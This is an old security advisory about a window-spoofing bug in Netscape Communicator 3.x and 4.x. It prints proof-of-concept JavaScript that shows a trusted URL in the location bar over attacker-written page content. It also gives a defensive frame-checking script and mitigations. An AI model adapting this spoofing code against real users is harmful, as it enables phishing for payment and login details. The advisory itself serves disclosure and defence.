COMMAND

    Netscape Communicator

SYSTEMS AFFECTED

    Netscape Communicator 3.x, 4.x (IE?)

PROBLEM

    Georgi  Guninski  found  following.   There  is  a bug in Netscape
    Communicator  3.04,4.06,4.5  Win95  and  4.08  WinNT, which allows
    "window spoofing".  After visiting  a hostile page (or clicking  a
    hostile link)  a window  is opened  and its  location is a trusted
    site.   However, the  content of  the window  is not  that of  the
    original site, but it is supplied  by the owner of the page.   So,
    the user is  misled he is  browising a trusted  site, while he  is
    browsing a  hostile page  and may  provide sensitive  information,
    such as credit card number.   The bug may be exploited using  HTML
    mail  message.   It  needs  Javascript  enabled.  Demonstration is
    available at:

        http://www.nat.bg/~joro/b14.html
        http://www.whitehats.com/guninski/b14.html

    This bug  is different  from the  "frame spoofing  vulnerability".
    The code is:

        function doit()
        {

        a.document.open();
        a.document.write("<H1>Look at the location bar!<BR>");
        a.document.write("<A HREF='http://www.whitehats.com/guninski'>Go to
        Georgi Guninski's home page</A></H1>");
        a.document.close();
        }

        function winopen() {
        a=window.open("view-source:javascript:location='http://www.yahoo.com';");
        setTimeout('doit()',30000);
        }

        </SCRIPT>


        <A HREF="javascript:void(0)" onclick="winopen()"
        onMouseOver="window.status='http://www.yahoo.com';return true">
        Follow this link to go to www.yahoo.com (or somewhere else)
        </A>

    According  to  Robert   Thomas  this  was   reported  earlier   by
    Secure Experts as a frame spoof bug.  MS came up with a lame patch
    for  IE  (that  didn't  work  for  all  cases  BTW).   Seem   like
    sexureexperts come up with following.  On the page being called up
    in the window i.e.   the page to be  protected should contain  the
    following (frames or not):

    <SCRIPT LANGUAGE="JavaScript">

    <!--

    checkMyFramesMulti();

    function ErrorHandler(errorMessage,url,line)
    {
      spoofDetected("  Error message: "+
             errorMessage+
            "\n  Line number: "+
             line, "TOP", url);
      return true;
    }

    onerror = ErrorHandler;

    function checkMyFramesMulti()
    {
      checkMyFrames();
      setTimeout("checkMyFramesMulti()", 15000);

    }

    function checkMe()
    {
      setTimeout("checkMyFrames()", 3000);

    }

    function checkMyFrames()
    {
      var browsername = navigator.appName;
      var browserversion = parseInt(navigator.appVersion);
      var itsok;
      var frameUrl;
      var numFrames;
      var i;

      if( (browsername == "Netscape") && (browserversion >= 3) )
      {
        if( self.opener != null )
          spoofDetected(" OPENER NOT NULL!!", "TOP", "self.opener");
      }


      frameUrl = location.href;
      itsok = urlOk(frameUrl);
      if(  itsok.indexOf("false") == 0 )
           spoofDetected(" Top is bad!!", "TOP", frameUrl);

      numFrames = self.frames.length;

      for( i = 0; i < numFrames; i++ )
      {
         frameUrl = self.frames[i].location.href;
         itsok = urlOk(frameUrl);
         if(  itsok.indexOf("false") == 0 )
            spoofDetected(" This frame is bad!!", i, frameUrl);
      }


    }

    function urlOk(frameUrl)
    {
      var thismany = parseInt(getAuthInfoNum());
      var itsok = "false";
      var Url;
      var i;
      for( i = 0; i < thismany; i++)
      {
        Url = getAuthInfo(i);
        if(frameUrl.indexOf(Url) == 0)
            itsok = "true";
      }
      return itsok;
    }

    function spoofDetected(msg, frm, theUrl)
    {
      var browsername = navigator.appName;
      var browserversion = parseInt(navigator.appVersion);

      if( (browsername == "Netscape") && (browserversion >= 3) )
      {
        if( self.opener != null )
          self.opener = null;
      }
      // spoofpage.html is an error page that gets pulled up on
      // detection of an error.

      top.location.href = "spoofpage.html";

    }

     function getAuthInfo(whichone) {
     var legalUrls = new
    Array('http://www.agency.gov','http://www.agency.gov/left.html','http://www.agency.gov/top.html','http://www.agency.gov/main.html');
     return legalUrls[whichone];
     }

     function getAuthInfoNum() {
      return 4;
     }
    // -->

    </SCRIPT>

    In the framed page add the onUnload command:

        <BODY BGCOLOR="#FFFFFF" onUnload="parent.checkMe()">

SOLUTION

    Disable Javascript.   The solution  to this  was provided  to a US
    Government Agency by a contractor.   The agency has a high  public
    trust and visibility and this was a concern.  Any questions can be
    addressed to krawls@erols.com.   Netscape acknowledged bug. Frames
    or not,  this bug  was discussed  in some  detail in  the O'Reilly
    book _Web Security and Commerce_ by Garfinkel and Spafford.  Since
    its original  publication date  is June  1997, this  bug has  been
    known for  almost two  years.   Netscape released  version 4.51 of
    Communicator.  It seems to fix the window spoofing bug.